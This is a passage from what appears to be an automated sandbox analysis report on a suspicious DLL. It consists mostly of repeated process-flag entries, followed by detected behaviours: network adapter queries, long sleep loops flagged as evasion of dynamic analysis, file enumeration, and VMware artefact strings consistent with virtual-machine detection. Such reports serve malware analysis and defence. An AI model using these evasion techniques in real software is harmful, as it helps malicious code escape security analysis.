Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	22_2_013A5904
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	22_2_013A6984
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,	22_2_013ADDF8

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 5001	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 4879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 468	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8936	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 694	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 672	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 2.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 6660	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep count: 5001 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep time: -300060000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep count: 4879 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7324	Thread sleep time: -292740000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7704	Thread sleep time: -224000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7728	Thread sleep time: -46800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7704	Thread sleep time: -8936000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8 FindFirstFileExW,	6_2_00000001800192B8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,	22_2_013A8BA8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	22_2_013A1A08
Source: C:\Windows\explorer.exe	Code function: 22_2_013ADCE0 FindFirstFileW,	22_2_013ADCE0

Source: C:\Windows\System32\loaddll64.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 